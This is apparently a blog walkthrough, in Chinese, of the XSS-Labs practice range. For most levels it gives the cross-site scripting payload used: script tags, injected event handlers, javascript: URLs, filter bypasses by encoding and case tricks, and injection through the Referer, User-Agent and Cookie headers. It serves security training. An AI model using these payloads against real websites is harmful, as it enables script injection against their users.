XSS_Labs靶场通关笔记

每一关的方法不唯一;可以结合源码进行分析后构造payload;

通关技巧(四步):

1.输入内容看源码变化;

2.找到内容插入点;

3.测试是否有过滤;

4.构造payload绕过

第一关

构造payload:name=<script>alert()</script>

第二关

构造payload:" οnclick=alert() "

第三关

构造payload:' οnclick=alert() '

第四关

构造payload:" οnclick=alert() "

第五关

构造payload:"><a href="javascript:alert()">123</a>//

第六关

构造payload:" Onclick=alert() "

第七关

构造payload:" oonnclick=alert() "

第八关

在url中构造payload:javascr%09ipt:alert()

也可以用html实体编码替换script中的一个字符来绕过(方法很多,不演示)

第九关

构造payload:javascri&#112;t:alert('http://')

第十关

构造payload:t_sort=" οnclick=alert() type="

第十一关

通过bp抓包修改referer:" οnclick=alert() type="

第十二关

通过bp抓包修改User-Agent: " οnclick=alert() type="

第十三关

通过bp抓包修改Cookie: user=" οnclick=alert() type="

第十四关(坏了,直接略过)

第十五关

构造payload:src="level1.php?name=</h2><h2 οnclick=alert()>123"

第十六关

构造payload:keyword=<input%0Aοnclick=alert()>

对空格进行实体编码了,需要空格绕过

由于浏览器不支持flash,17、18、19、20略过

10

相关推荐
伊成20 分钟前
docker安装Consul笔记
笔记·docker·consul
zstar-_32 分钟前
Claude code在Windows上的配置流程
笔记·算法·leetcode
Hockor1 小时前
用 Kimi K2 写前端是一种什么体验?还支持 Claude Code 接入?
前端
杨进军1 小时前
React 实现 useMemo
前端·react.js·前端框架
海底火旺1 小时前
浏览器渲染全过程解析
前端·javascript·浏览器
你听得到111 小时前
揭秘Flutter图片编辑器核心技术:从状态驱动架构到高保真图像处理
android·前端·flutter
驴肉板烧凤梨牛肉堡1 小时前
浏览器是否支持webp图像的判断
前端
Xi-Xu1 小时前
隆重介绍 Xget for Chrome:您的终极下载加速器
前端·网络·chrome·经验分享·github
摆烂为不摆烂1 小时前
😁深入JS(九): 简单了解Fetch使用
前端
杨进军1 小时前
React 实现多个节点 diff
前端·react.js·前端框架